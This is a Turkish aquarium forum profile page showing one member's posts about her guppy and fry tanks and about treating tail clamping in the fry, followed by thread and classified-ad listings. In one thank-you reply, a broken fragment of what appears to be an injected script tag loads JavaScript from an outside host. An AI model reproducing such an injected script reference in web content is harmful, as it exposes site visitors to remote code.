ÖZELLİKLER
Kullanıcı Adı:
Betul.o
Kullanıcı Grubu:
Forum Üyesi
Geri Bildirimleri:
Aldığı Beğeni:
1
Hesap Durumu:
Aktif
Durumu:
Çevrim Dışı
Üyelik Tarihi:
03 Şubat 2014 20:23
Son Ziyaret:
09 Kasım 2014 21:44
Toplam Mesaj:
104 [0.02 Gün Ortalaması]
Paylaşım Sayisı:
0 (Son 6 Ay)
İlan Sayisı:
BİLGİLER
Ad Soyad:
Betül Özkal
Doğum Tarihi:
Girilmedi
Yaş:
Bilinmiyor
İl:
Istanbul
Meslek:
Özel Mesaj:
Sohbet Talebi:
Üye Favorile:
Sosyal Medya:
İMZA
SON 10 MESAJI
Lepistes ve Yavru Akvaryumum ( bol fotoğraflı )
[QUOTE=barisbaris11]Betül Hanım Çok şahane bir kurulum olmuş hayırlı olsun.Yavru akvaryumundaki yavruları ne ile besliyorsunuz ? Ana tanktaki iç filtreyi değiştirin bana kalırsamaddi durumunuz varsa dış filtre alın derim yada tepe filtre iç filtre çok yer kaplıyor :( Ama kurulumunuz çok güzel beğendim :)[/QUOTE]
[QUOTE=barisbaris11]Betül Hanım Çok şahane bir kurulum olmuş hayırlı olsun.Yavru akvaryumundaki yavruları ne ile besliyorsunuz ? Ana tanktaki iç filtreyi değiştirin bana kalırsamaddi durumunuz varsa dış filtre alın derim yada tepe filtre iç filtre çok yer kaplıyor :( Ama kurulumunuz çok güzel beğendim :)[/QUOTE]
Öncelikle teşekkür ederim. Yavruları 3 4 yemle besliyorum. Gemmanın baby multi color, sera vipan, sera flora, ve kabuksuz artemia ile besliyorum bugün 11 tanesi 3 haftalık oldular diğerleri 2 haftalıklar daha. Dış filtre akvaryumun dışında yer kapluyor. Olduğu kadar kalsın şimdi filtremi değiştirme gibi bir düşüncem yok Teşekkür ederim tekrar
Lepistes ve Yavru Akvaryumum ( bol fotoğraflı )
[QUOTE=MmerakK57]Şu Kırmızı Lepistesinizz Harikaymış
[/QUOTE]
Nazar deydirdiniz oğluma :) Kuyruk erimesi başladı
[QUOTE=MmerakK57]Şu Kırmızı Lepistesinizz Harikaymış
[/QUOTE]
Nazar deydirdiniz oğluma :) Kuyruk erimesi başladı2 haftalık yavrularda kuyruk kısılması
Arkadaşlar yavrularımda kuyruk kısılması geçmiş durumda. Bir çok konu okudum forumdan olsun farklı forumlardan olsun kimse bu konu hakkında kesin bir kanıya ulaşamamış. Ben ilaç kullanımı yapmak istemedim yavrular henüz 1,5 haftalık %75'i çekindim açıkçası. Okuduğum konularda genellikle ısı yükseltimi ve bol oksijenden bahsedilmiş. Başka bi konuda ise B vitaminin iyi geldiği konusu idi.
Betul.o 2014-04-04 12:39:17
Arkadaşlar yavrularımda kuyruk kısılması geçmiş durumda. Bir çok konu okudum forumdan olsun farklı forumlardan olsun kimse bu konu hakkında kesin bir kanıya ulaşamamış. Ben ilaç kullanımı yapmak istemedim yavrular henüz 1,5 haftalık %75'i çekindim açıkçası. Okuduğum konularda genellikle ısı yükseltimi ve bol oksijenden bahsedilmiş. Başka bi konuda ise B vitaminin iyi geldiği konusu idi.
Uyguladığım tedavi; İlk olarak bu rahatsızlığın neyden kaynaklı olduğunu araştırmak gerekiyor. Stres çoğu hastalığın baş sorunu olmakla beraber farklı sorunlarda olabiliyor. Su değerlerinin değişmesi gibi. Ben hastalığa neden olabilecek bütün sorunları göz önünde bulundurdum. Genellikle yavruların gelişimini videoya alıyordum izlediğim videoda 2 gün önce birşey yokken 2 gün sonra kısılma olduğunu tespit ettim. Konuyu daraltarak soruna odaklandım ve su değişiminden sonra olduğunu düşünerek stres kaynaklı olduğuna karar verdim.
- Öncelikle yavru akvaryumunda ki ısıyı 25 dereceden 27 dereceye yükselttim.
- İç filtre kullanıyordum onu çıkartarak pipo filtre aldım ve bol oksijen verdim.
- Yavrulara sera vipan ve sera flora yemlerini havanda toz haline getirerek Bemiks adlı B vitamininin 3/1'ini yeme emdirerek yavruların akvaryumuna döktüm. Bu ilacı sabah akşam olmak üzere 2 gün kullandım.
- Su değişimlerini akvaryum suyuna göre ayarlıyarak ( taze suyu kaynatıp, ısı ayarı yaparak) yavru akvaryumuna hava hortumu ile yavaş yavaş ekleme yaptım.
Bu uygulamaları yaptıktan 1 gün sonra %75 açılma gördüm. 2- 4 gün arasında da %100 açılma kaydettim. Yavruların 11 tanesi 2,5 haftalık. 26 tanesi 1,5 haftalık. 2 taneside 5 günlük şu an hiç birinde sorun yok. Doğumdan ötürü postür bozukluğu var 2 balığımda fakat onlar da gayet sağlıklı.
Dipte kalan yemleri de hava hortumu ve şırınga yardımıyla çekiyorum dipten yaklaşık 4 günde bir %10 kadar su çekimi ve ilavesi yapıyorum.
Umarım yardımcı olur bu konu size. Çok can sıkıcı bir durum. Geçmiş olsun hepimize
2 haftalık yavrularda kuyruk kısılması
Balıklarda sanırım stres kaynaklı kısılma mevcut. İlaç tedavisi uygulamadım çünkü ilaçları temin edemedim. Başka bir ilaç aldım oda kuyruk erimesi için tedavi edici bir ilaç olduğu için kullanmaya korktum. Akvaryumum da Isı arttırması yaptım 27 derecede şu an, iç filtre yerine pipo filtre aldım bol bol hava veriyorum ve %25 akvaryum suyuyla aynı sıcaklıkta su ekledim %90 açıldı kuyruklar 3 4 tanesinde hala kısıklık var fakat geçeceğini umut ediyorum. Ayriyetten ampul vitamin kullandım 2 kere yemlerine sıkıp emdiriyorum daha sonra akvaryuma ekliyorum. Umarım iyileşme devam eder ve kurtulurlar. 1 tane yavru kaybettim bu süreç içerisinde. İlerleyen zamanlarda gelişmeleri tekrardan paylaşırım.
Balıklarda sanırım stres kaynaklı kısılma mevcut. İlaç tedavisi uygulamadım çünkü ilaçları temin edemedim. Başka bir ilaç aldım oda kuyruk erimesi için tedavi edici bir ilaç olduğu için kullanmaya korktum. Akvaryumum da Isı arttırması yaptım 27 derecede şu an, iç filtre yerine pipo filtre aldım bol bol hava veriyorum ve %25 akvaryum suyuyla aynı sıcaklıkta su ekledim %90 açıldı kuyruklar 3 4 tanesinde hala kısıklık var fakat geçeceğini umut ediyorum. Ayriyetten ampul vitamin kullandım 2 kere yemlerine sıkıp emdiriyorum daha sonra akvaryuma ekliyorum. Umarım iyileşme devam eder ve kurtulurlar. 1 tane yavru kaybettim bu süreç içerisinde. İlerleyen zamanlarda gelişmeleri tekrardan paylaşırım.
Lepistes ve Yavru Akvaryumum ( bol fotoğraflı )
[QUOTE=Protect]
Yavruları kurtarmam için rafya önemli rol oynuyor akvaryumda. Yavruluğa ayırmak istemiyorum doğum yapıcak anneyi strese sokmaktansa sağlıklı olabilen yavruların kurtulması daha iyi oluyor benim için. Teşekkür ederim. Zamanla arkadaki hortum yok olacaktır. Bitkilerin uzamalarını bekliyorum budama yaparak arka planı kapatıcağım. Teşekkür ederim
Betul.o 2014-04-01 17:10:09
[QUOTE=Protect]
Akvaryum güzel olmuş eline sağlık ; rafya baya bi sırıtıyor bide iç filtredeki hortum
ama şuda var mükemmel olacak diye birşeyde yok 
[/QUOTE]

Yavruları kurtarmam için rafya önemli rol oynuyor akvaryumda. Yavruluğa ayırmak istemiyorum doğum yapıcak anneyi strese sokmaktansa sağlıklı olabilen yavruların kurtulması daha iyi oluyor benim için. Teşekkür ederim. Zamanla arkadaki hortum yok olacaktır. Bitkilerin uzamalarını bekliyorum budama yaparak arka planı kapatıcağım. Teşekkür ederim
[QUOTE=dpsKinG_]Maşallah kurulumunuz çok güzel olmuş tebrik ederim hiçte acemice gelmedi bana. Özellikle ana tankta iç filitreye yaptığınız sistem çok zekice sirkülasyon olayını çok iyi anlamışsınız. Yavruları küçük akvaryuma ayırmanızda güzel olmuş zamanla o bitkiler büyüyecekler bütün arka planı kaplıyacaklar o zaman artık yavruları ayırmanıza gerek kalmayacak. Hatta o eledoalar öyle hızlı büyürlerki artık budamaktan bıkarsınız :))
[/QUOTE]
[/QUOTE]
Henüz 1,5 aylık akvaristim. Forumda okuduğum ve edindiğim bilgiler doğrultusunda kurulum yaptım. İç filtrem çok akım yarattığı için balıklar savruluyordu bende bu sistemi yapmaya karar verdim. Kendim yapıcaktım fakat akvaryumcuda bulunca taktım oldu :). Biraz fazla sırıtıyor fakat su yüzeyinde oluşan sirkülasyon nedeniyle oksijen yaratıyor böylelikle hava motorunuda kullanmamış oluyorum. Yavryları yavrulukta büyütmek gelişimleri için olumsuz oluyormuş bende 10 litrelik akvaryum aldım onlar için orada bakıyorum büyüsünler ana tanka salacağım. Bitkilerinde büyümesini bekliyorum yazın fazlalaştıracağım. Teşekkür ederim.
[QUOTE=eozen81]Betül Hanım, tebrikler.
Yavru tankınızda iç motor yavruları yormuyor mu pipo filtre daha iyi olmaz mıydı?
[/QUOTE]Yavrular için fazla gelmiyordu fakat oksijen çok fazla vermediği için pipo filtreye geçtim. Kuyruk kısılması sorunu ile karşılaştım tedavi için piponun şart olduğunu düşünerek değiştirdim. Teşekkür ederim.

[QUOTE=Kaan Aziz]Maşallah...
Bitki çeşidini arttırabilirseniz çok daha güzel olabilir.
[/QUOTE]Kaan bey teşekkür ederim. Bitki çeşidini arttıracağım şu an okul nedeniyle çok fazla ilgilenemiyorum budama yaptığım zaman yine çoğalacak bitkiler.
[QUOTE=eozen81]Bir öneri de arka planı tek renk yapın mesela siyah ya da mavi gibi. Bitkili de bence tek renk dışındaki arka planlar dikkat dağıtıyor.[/QUOTE]
Işıklandırmam yetersiz olduğu için arka plana tek renk uygulayamıyorum. Üst kapak yaptığımda ışıklandırmayı arttırıcağım. Teşekkürler öneri için
[QUOTE=dpsKinG_]Maşallah kurulumunuz çok güzel olmuş tebrik ederim hiçte acemice gelmedi bana. Özellikle ana tankta iç filitreye yaptığınız sistem çok zekice sirkülasyon olayını çok iyi anlamışsınız. Yavruları küçük akvaryuma ayırmanızda güzel olmuş zamanla o bitkiler büyüyecekler bütün arka planı kaplıyacaklar o zaman artık yavruları ayırmanıza gerek kalmayacak. Hatta o eledoalar öyle hızlı büyürlerki artık budamaktan bıkarsınız :))
[/QUOTE]
[QUOTE=eozen81]Betül Hanım, tebrikler.
[QUOTE=dpsKinG_]Maşallah kurulumunuz çok güzel olmuş tebrik ederim hiçte acemice gelmedi bana. Özellikle ana tankta iç filitreye yaptığınız sistem çok zekice sirkülasyon olayını çok iyi anlamışsınız. Yavruları küçük akvaryuma ayırmanızda güzel olmuş zamanla o bitkiler büyüyecekler bütün arka planı kaplıyacaklar o zaman artık yavruları ayırmanıza gerek kalmayacak. Hatta o eledoalar öyle hızlı büyürlerki artık budamaktan bıkarsınız :))
[/QUOTE]
Henüz 1,5 aylık bir akvaristim. Okuduğum ve öğrendiğim bilgiler doğrultusunda ilerlemeye çalışıyorum. İç filtremin akıntısı çok yüksek olduğu için şelale aparatı yapıcaktım fakat hazır buldum çok iyi oldu. Su üzerinde sirkülasyon yaparak oksijen sağlıyorum ve balıkların yorulmamasını sağlıyorum. Yavruları yavrulukta büyütmek istemedim gelişimleri yavaş kalıyormuş o yüzden 10 litrelik bir akvaryum aldım. Bitkileri yazın çoğaltıcam ve budayıp ekliyeceğim arka plana fakat bir süre beklemeleri gerekiyor. Teşekkür ederim
[QUOTE=dpsKinG_]Maşallah kurulumunuz çok güzel olmuş tebrik ederim hiçte acemice gelmedi bana. Özellikle ana tankta iç filitreye yaptığınız sistem çok zekice sirkülasyon olayını çok iyi anlamışsınız. Yavruları küçük akvaryuma ayırmanızda güzel olmuş zamanla o bitkiler büyüyecekler bütün arka planı kaplıyacaklar o zaman artık yavruları ayırmanıza gerek kalmayacak. Hatta o eledoalar öyle hızlı büyürlerki artık budamaktan bıkarsınız :))
[/QUOTE]
Henüz 1,5 aylık bir akvaristim, okuduğum öğrendiğim kadarıyla yapmaya çalışıyorum. İç filtremin akıntısı yüksek geldiği için o sistemi düşündüm. Aparatı hazır olarak satıyorlarmış kendim yapıcaktım bulamasaydım. Şimdi su üzerinde sirkülasyon yaparak oksijen sağlıyorum motor kullanmama gerek kalmadı. Yavruları yavrulukta büyütmek istemedim gelişimleri yavaş olduğu için 10 litrelik akvaryumda şu an 2,5 haftalık ve 1,5 haftalık yavrularım var maşallahları var nazar deymesin kocaman oldular. Bitkiler uzadıkça arka planı kapatıcağım. Teşekkür ederimm.
[QUOTE=eozen81]Betül Hanım, tebrikler.
Yavru tankınızda iç motor yavruları yormuyor mu pipo filtre daha iyi olmaz mıydı?
[/QUOTE]Teşekkürler emre bey, İç filtrenin yorduğu kanısına vararak pipo filtre aldım akvaryuma. Kuyruk kısılması oldu yavrular bol oksijen gerektiği için değiştirdim filtreyi şu an gayet rahat yüzüyorlar.


[QUOTE=dpsKinG_]Maşallah kurulumunuz çok güzel olmuş tebrik ederim hiçte acemice gelmedi bana. Özellikle ana tankta iç filitreye yaptığınız sistem çok zekice sirkülasyon olayını çok iyi anlamışsınız. Yavruları küçük akvaryuma ayırmanızda güzel olmuş zamanla o bitkiler büyüyecekler bütün arka planı kaplıyacaklar o zaman artık yavruları ayırmanıza gerek kalmayacak. Hatta o eledoalar öyle hızlı büyürlerki artık budamaktan bıkarsınız :))
[/QUOTE]
Henüz 1,5 aylık bir akvaristim. Okuduğum ve öğrendiğim bilgiler doğrultusunda ilerlemeye çalışıyorum. İç filtremin akıntısı çok yüksek olduğu için şelale aparatı yapıcaktım fakat hazır buldum çok iyi oldu. Su üzerinde sirkülasyon yaparak oksijen sağlıyorum ve balıkların yorulmamasını sağlıyorum. Yavruları yavrulukta büyütmek istemedim gelişimleri yavaş kalıyormuş o yüzden 10 litrelik bir akvaryum aldım. Bitkileri yazın çoğaltıcam ve budayıp ekliyeceğim arka plana fakat bir süre beklemeleri gerekiyor. Teşekkür ederim
2 haftalık yavrularda kuyruk kısılması
Fotoğraf:
Canlıdaki Belirtiler: kuyruk kısılması
Akvaryum Kapasitesi (litre): 10 litre
Akvaryumdaki Diğer Canlılar: 2 salyangoz kırmızılardan
Bilinen Tüm Su Değerleri (pH, sıcaklık, amonyak, nitrat):
Filitrasyon: iç filtre
İlaç Kullandıysanız İsimleri ve Miktarları:
Diğer Genel Bilgiler (Su değişim sıklığı, akvaryumda en son yaptığınız değişiklikler vb.) : Su sıcaklığı 25 derece, %10 15 gibi su değişimi, ana tanktan alınan 2 eledoa bitkisi ( yavru tankından alınan 1 bardak suyla yıkandı), Telefon ışığı ( flash tutumu stres yaratabilirmiş öyle duydum).
Fotoğraf:
Canlıdaki Belirtiler: kuyruk kısılması
Akvaryum Kapasitesi (litre): 10 litre
Akvaryumdaki Diğer Canlılar: 2 salyangoz kırmızılardan
Bilinen Tüm Su Değerleri (pH, sıcaklık, amonyak, nitrat):
Filitrasyon: iç filtre
İlaç Kullandıysanız İsimleri ve Miktarları:
Diğer Genel Bilgiler (Su değişim sıklığı, akvaryumda en son yaptığınız değişiklikler vb.) : Su sıcaklığı 25 derece, %10 15 gibi su değişimi, ana tanktan alınan 2 eledoa bitkisi ( yavru tankından alınan 1 bardak suyla yıkandı), Telefon ışığı ( flash tutumu stres yaratabilirmiş öyle duydum).
Arkadaşlar yavrularım 2 haftalık yeni yeni büyümeye şekil almaya başladılar. Su değişimi 1 hafta içerisinde 2 kere dip çekimi yaptım ve en son 2 gün öncede yem birikmişti onu çektim. Taze dinlenmiş su ekliyorum çeşmeden. en az 1 hafta dinleniyor genel olarak fakat en son eklediğim suyu 2 gün dinlendirmiştim. %10 anca eklemişimdir. Dün fark ettim kısılma olduğunu ondan önceki gün birşey yoktu diye anımsıyorum. Akvaryumumda iç filtre var kadın çorabı geçirdim altına onu kullanıyorum. Birde yavru akvaryumun da ışık olmadığından flash ışığı ile gelişimlerine bakıyordum kuyruk yapılarına v.s dün bi baktım üçgen şeklini almış kuyruklar. Arkadaşlar 38 yavrum var çoğunda bu rahatsızlık var nasıl geçiririm yardımcı olun lütfen. Acil cevaplarınızı bekliyorum
Lepistes ve Yavru Akvaryumum ( bol fotoğraflı )
[QUOTE=tolunay]Maşallah bitkilerin konumları bence çok iyi ama arkaya saz dikerek akvaryumu daha doğal yapabilirsiniz birde 52 litreye 200 watt ısıtıcı fazla değilmi ?[/QUOTE]
100 w alıcaktım yanlış almışım bir sakıncası yok sadece 100w'a göre daha az süre çalışıyor. Hepsi bu okulum yüzünden pek fazla ilgilenemiyorum okul bitince bitkilendirmeyi arttıracağım
[QUOTE=tolunay]Maşallah bitkilerin konumları bence çok iyi ama arkaya saz dikerek akvaryumu daha doğal yapabilirsiniz birde 52 litreye 200 watt ısıtıcı fazla değilmi ?[/QUOTE]
100 w alıcaktım yanlış almışım bir sakıncası yok sadece 100w'a göre daha az süre çalışıyor. Hepsi bu okulum yüzünden pek fazla ilgilenemiyorum okul bitince bitkilendirmeyi arttıracağım
Lepistes ve Yavru Akvaryumum ( bol fotoğraflı )
[QUOTE=Stenia]Maşallah çok güzel görünüyorlar. Sağlıklı balıklar dilerim. Ana tankın arka tarafını kapatma şansınız varsa çok daha güzel olur. Yada elodea, saz gibi bitkilerle tamamen kapatırsanız tadından yenmez.
[QUOTE=BadWolf]Çok güzel olacak. Yanlız bence elodea lar çok uzamış. Üstten kesip kesip yanlara ekerseniz hem çoğalırlar, hemde su yüzeyini örtmezler. Suyu da tam doldurun derim..[/QUOTE]
Bitkilerin biraz daha uzamasını bekliyorum daha verimli olsun ve formlarını kaybetmesinler diye. Suyuda tam doldurmuyorum salyangozlarım çiftleşiyorlar yumurta bırakmaları için bıraktım o boşluğu Teşekkür ederim
Betul.o 2014-03-28 19:13:33
[QUOTE=Stenia]Maşallah çok güzel görünüyorlar. Sağlıklı balıklar dilerim. Ana tankın arka tarafını kapatma şansınız varsa çok daha güzel olur. Yada elodea, saz gibi bitkilerle tamamen kapatırsanız tadından yenmez.
Bu arada fotoğrafları hangi makine ile çektiniz acaba?
[/QUOTE]İlk fotograf boş haliydi arka tarafa arka plan yapıştırmıştım zaten farketmediniz sanırım yada farklı birşeyden bahsediyorsunuz. Temennileriniz için teşekkür ederim. Bitkiler mevcut içeride ama biraz zamanım kısıtlı olduğundan ilgilenemiyorum.
Bu arada fotoğrafları canon 60d ile çektim
[QUOTE=BadWolf]Çok güzel olacak. Yanlız bence elodea lar çok uzamış. Üstten kesip kesip yanlara ekerseniz hem çoğalırlar, hemde su yüzeyini örtmezler. Suyu da tam doldurun derim..[/QUOTE]
Bitkilerin biraz daha uzamasını bekliyorum daha verimli olsun ve formlarını kaybetmesinler diye. Suyuda tam doldurmuyorum salyangozlarım çiftleşiyorlar yumurta bırakmaları için bıraktım o boşluğu Teşekkür ederim
Lepistes ve Yavru Akvaryumum ( bol fotoğraflı )
Arkadaşlar bu hobide daha çok yeniyim, yaklaşık 1 ay 1 haftalık akvaryum sahibiyim. Balıklarımı hamile olarak almıştım. Hamile oldukları için doğumunun ne zaman olacağını kestiremiyordum. Forumdan bir üyeden bitki satın aldım ve bitkilendirdim akvaryumumu. Çok fazla bitki olmadığı için ilk doğumda yavrularımdan çok azını kurtarabildim en azından ben öyle düşünüyorum. İlk doğumda 11 yavru ayırabildim akvaryumdan. Daha sonraki doğumda yine evde olmama rağmen 27 adet yavru topladım akvaryumdan. 1 adet ölü doğum olmuş 1 tanesini sanırım ben yanlışlıkla öldürdüm :/. Toplam 40 adet falandı yavrularım.

Arkadaşlar bu hobide daha çok yeniyim, yaklaşık 1 ay 1 haftalık akvaryum sahibiyim. Balıklarımı hamile olarak almıştım. Hamile oldukları için doğumunun ne zaman olacağını kestiremiyordum. Forumdan bir üyeden bitki satın aldım ve bitkilendirdim akvaryumumu. Çok fazla bitki olmadığı için ilk doğumda yavrularımdan çok azını kurtarabildim en azından ben öyle düşünüyorum. İlk doğumda 11 yavru ayırabildim akvaryumdan. Daha sonraki doğumda yine evde olmama rağmen 27 adet yavru topladım akvaryumdan. 1 adet ölü doğum olmuş 1 tanesini sanırım ben yanlışlıkla öldürdüm :/. Toplam 40 adet falandı yavrularım.
Ana akvaryumum 52 litrelik bir akvaryum. İçerisinde İÇ filtrem, 200wlık ısıtıcı, 15wlık gro-lüks bitki florasan var. Hava taşı da bulunmakta fakat ben kullanmıyorum. Kum olarak bitki kumum mevcut aqua ve dere kumu karışımı var. Ayriyetten 4 ufak parça antalya kayası mevcut içeride. Forum üyesinden almış olduğum bitkilerim de 3 aşk merdiveni 15 eledoa ve 3 tilki kuyruk mevcut. Daha önce almış olduğum anubias bitkim de taşa sarılı şekilde akvaryumda durmakta. Haftalık %15-20 civarında su değişimi yapıyorum. İlaç gübreleme v.s kullanılmıyor.
İçerisinde bulunan canlılar ise; 8 adet lepistes 2 erkek 6 dişi ( 1 tane dişim damızlık altı sanırım). 4 adet çöpçü ( 2 si albino 2 si komando). 2 adet elma salyangoz ( sanırım biri dişi biri erkek çünkü sürekli çiftleşiyorlar fakat yumurta alamadım onlardan hala). 1 Albino cüce vatoz var ( erkek). 1 tane de karides var ( bitki aldığım arkadaş 5 adet vermişti fakat diğerlerini sanırım yemişler 1 tane kaldı oda çok güzel renklendi).
Kullandığım yemler ise; Sera flora, Sera Vipan ve sera tubifex.
Yavrular doğalı 2 hafta oldu onları ilk başta aldığım plastik yavruluk da tutuyordum fakat içim el vermedi 10,5 litrelik akvaryum aldım onlarada. İçerisinde 50w ısıtıc ve ufak bi iç filtrem var. 1 haftadır yavru akvaryumumdalar ve gelişimleri gerçekten çok fark etti. 38 tane yavru bulunuyor içerisinde. Akvaryumda kum vs hiç bir şey kullanmıyorum. Dip çekimi haftada 2 defa %20 şekilde oluyor. Enteresan olarak içlerinde ki bir adet yavrunun uyruğu kılıç kuyruk gibi uzun ve sivri. Ya 1 haftalık yada 2 haftalık yavru emin değilim fakat 1 haftalıklarla aynı boyutta gelişicek mi yoksa yanık mı kalacak bilmiyorum. Renklenmeye başlamalarını merakla bekliyorum.
Yavrular için kullandığım yemler ise: Kabuksuz artemia ve Gemma baby multi clor.
Maşallah demeyi unutmayın :) Bol bol fotoğraf ekliyorum elimden geldiğince. Okuduğunuz için teşekkür ederim.
Maşallah demeyi unutmayın :) Bol bol fotoğraf ekliyorum elimden geldiğince. Okuduğunuz için teşekkür ederim.

Not: Fotoğraflar şahsıma aittir izinsiz kullanılamazlar
İlk deneyim ( Fotoğraflı )
[QUOTE=eozen81]Yavru akvaryumunu da yapmışsınız, işler büyüyor
[QUOTE=eozen81]Yavru akvaryumunu da yapmışsınız, işler büyüyor

Sağlık dilerim balıklarınıza
[/QUOTE]
< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">Teşekkür ederimm
. İçim el vermedi yavrulukta büyümelerine bende ufak bir akvaryum aldım ve onlara kurdum. Büyüyorlar gün geçtikçe.
. İçim el vermedi yavrulukta büyümelerine bende ufak bir akvaryum aldım ve onlara kurdum. Büyüyorlar gün geçtikçe. SON MESAJLAR
- Limnophila Sessiliflora Zorluğu Nedir Khatrom, 10:55
Bitki Türleri ve Bakımı - Sobo Wp-628h Filtrasyon Malzemesi EmiirKaan, 01:58
Yeni Üye Forumu - Astronot Balığı Bilgi Ve Düşünceleriniz Hsrt, 01:21
Yeni Üye Forumu - Low Tech Bitki Tavsiyesi EmiirKaan, 01:12
Akvaryum ve Tür Tavsiyesi - Sessiz Şelale Filtre Önerisi BASARSURMEGOZ, 00:35
Filtreleme Seçenekleri - Üçgen Şekilli Yosun Cyber_Scout, 00:31
Yosun - Kahverengi Uzun Ve Kısa Yuvarlak Yapılar Sekizo, 23:52
Akvaryum Bilimi - Betta Balığımın Kuyruğunun Düzelmemesi NautilusLordu, 23:19
Hastalıklar ve İlaçlar - Elyaf Kromatit, 22:35
Filtreleme Seçenekleri - İlaç Satışı Neden Yok? GhostKoi, 22:16
Hastalıklar ve İlaçlar - Nano Akvaryum İçin Vatoz Türü Önerisi JujuSeri, 21:56
Akvaryum ve Tür Tavsiyesi - Ankara Deniz Akvaryum Taha⚡, 21:14
Akvaryumcu Önerileri ve Duyuruları - Sürekli Tetra Kaybı - Neden? mustafakrml, 20:41
Hastalıklar ve İlaçlar - 60p Dutch Style Kturan06, 19:49
Akvaryum Tanıtımı - Ember Tetra nniiaa, 16:17
Amerikan Tetraları - Yıllar Sonra Tekrar - Tavsiyelere Açığım m170, 15:23
Yeni Üye Forumu - Yıllar Sonra Hobiye Dönüş enginhayta, 07:03
Akvaryum Tanıtımı - Beta Balığı Kuyruk Erimesi Cyber_Scout, 04:10
Hastalıklar ve İlaçlar - 50x30x30 Akvaryum İçin Tavsiyeler. ugurbaran, 00:14
Yeni Üye Forumu - 60x40x40 Walstad Akvaryum Ve Kurulum Süreci syerli, 23:11
Akvaryum Tanıtımı - 400 Litre Havuz Sufisu, 22:37
Kendin Yap Sistemler (DIY) - Ana Tankta Baktopur? Leo, 22:32
Hastalıklar ve İlaçlar - Lepistes Havuzu Conix, 21:49
Akvaryum Tanıtımı - Bu Partiküllerden Kurtulamadim. Çözüm Önerisi Olan Cyber_Scout, 20:23
Tanganyika Cichlidleri - 80x40x40 Akvaryum Oase Biomaster 200 hakanmorcicek, 19:38
Yeni Üye Forumu - Geophagus Tür Ayrımı? Cyber_Scout, 19:25
Akvaryum ve Tür Tavsiyesi - Neocaridina Karides Hastalık Tatar10, 19:03
Hastalıklar ve İlaçlar - Hangi Canlıları Eklemeliyim Cyber_Scout, 18:08
Yeni Üye Forumu - Akvaryumu Bozup Baştan Yapmak Ve Deniz Taşları Cyber_Scout, 17:17
Akvaryum ve Tür Tavsiyesi - Rasbora Oneri Tatar10, 16:44
Akvaryum ve Tür Tavsiyesi - 80x40x40 Akvaryum İçin Tür Önerileri (128 Litre) Frkn, 16:37
Akvaryum ve Tür Tavsiyesi - Pleksi İle Sump Yaptım fffurkan9, 16:09
Filtre ve Sump Yapımı - Bucephalandra Maharani Çiçeği ballantines, 16:09
Bitki Akvaryumları Genel - Ternapi Medaka Pondları Frkn, 15:43
Akvaryum Tanıtımı - Betta'daki Şişlik Nedir ByOscar:), 12:27
Hastalıklar ve İlaçlar - 10 Yıl Aradan Sonra.. Cyber_Scout, 10:27
Akvaryum ve Tür Tavsiyesi - L144 Kongfin Yavru Ölümleri Hk. Taha⚡, 09:43
Kedi Balıkları Forumu - Sıvı Gübre Nasıl Hazırlanır ? NightWist, 09:39
Taban ve Gübreleme - Süper Red Dişi Erkek Oranı sinan1166, 08:49
Kedi Balıkları Forumu - Gül Barb Her Koşulda Renkli Mi? Cyrenity, 06:07
Yeni Üye Forumu - Kum Miktarı İçin Bilginize İhtiyacım Var Arkadaşla Cyber_Scout, 03:42
Bitki Akvaryumları Genel - Kurtulma Şansı Var Mı? Cyber_Scout, 03:27
Discus - Su Yosunu Cyber_Scout, 03:13
Yosun - Nano Jungle bendeniztayfun, 00:22
Akvaryum Tanıtımı - Orta Amerika'ya Dönüş Frkn, 18:53
Akvaryum Tanıtımı - 150l+315l'ye; Fluval Vs. Eheim Vs. Aquael Vs. Jbl bendeniztayfun, 17:37
Filtreleme Seçenekleri - Akvaryum Balık Önerisi Ve Adet Önerisi sacityld, 16:24
Yeni Üye Forumu - Lapistes Yavruları scorpion26, 16:20
Canlı Doğuranlar - Yeni Kurduğum Karides Akvaryumu Nasıl? NightWist, 15:39
Akvaryum ve Tür Tavsiyesi - Medaka Japon Pirinç Balığı (japanese Rice Fish) scorpion26, 12:02
Diğer Tatlı Su Canlıları Tanıtımı
GÜNCEL 100 TANITIM
SON İLANLAR
- 🌿 Makro➕️ Mikro➕ Excel🌲 Akvaryum Gübreleri kilic88 11:14
- Ler Armatür Işık Aydınlatma yaguara 09:13
- Damızlık Lda16 Super Red Marble Düz Çiftler Kemalk41 08:29
- Lda16 Longfin Yavruları _rammstein_ 07:36
- Mpanga Ve Sarı Prenses Ercankurt 07:34
- Akvaryum , Su Piresi , Balık Yemi gyunda 07:27
- Flame Moss , Java Moss gyunda 07:27
- Karides , Salyangoz , Kırma Karides 3tl gyunda 07:27
- Gold Severum 13,5 Cm Ankara 📍 Gökdeniz Kale 07:09
- Blackline Tetra Jumbo Boy rasporasrc 01:51
- Sarı Ateş Neon Karides (neocaridina) rasporasrc 01:51
- Mdf Dolap Ve Ahşap Sehpa İmalatı GreeNWooD 01:37
- Lepistes Endler, Yerli Üretim 20 Tl Birtek 23:27
- Filitre Motor Mili Ve Ehaim Parçaları Arıyorum Birtek 23:27
- Crypto Wendti Green Brown. Birtek 23:27
- Aqua Master Aydınlatma 40 Cm poyraz43 23:15
- 10w Isıtıcı poyraz43 23:15
- Zateksuaritma Akvaryum Arıtma Sistemleri Reef Seri zafer3885 22:35
- Akvaryum Arıtma Sistemleri zafer3885 22:35
- Sunsun 603b Dış Filtre TurX 22:35
- Fluval Ve Jbl Sıfır Kapalı Kutu Son 1 Er Adet propecia 22:24
- 1 Metre Set Akvaryum Veya Tek Tek propecia 22:24
- Erkek Kribensis Takaslık teksas_tombiks 22:15
- Chihiros Wrgb-120cm 10th Edition Led Aydınlatma Deathgrip 21:51
- Akvaryum Taş Ve Kumu livadi 21:26
- Sarı Prenses- Beyaz Prenses- Auratus- Şeker Pembe Malawi market 20:46
- Kafalı Yunus Yavruları Malawi market 20:46
- Eheim Biopower 240 İç Filtre blenny 19:57
- Apostogramma Kakadu Çift "f2 Wild" sirhill 19:34
- Panda Oranda Japon Arıyorum 2 Adet sirhill 19:34
- Sağlıklı Anubias Bitkileri avok 19:12
- A Kalite Plakat Betta Yavruları poyrxz 18:47
- Dişi Plakat Betta Yavruları poyrxz 18:47
- Mikrofex & Su Piresi & Mikrokurt scorpion26 17:21
- Leleupi & 4 Çeşit Nadir Endler scorpion26 17:21
- Apistogramma Agassizii Double Red Genç Damızlık Thunderbird 17:14
- Lda 16 Vatoz mkursun 16:55
- Su Piresi & Yeşil Su & Infusoria Amati340 16:11
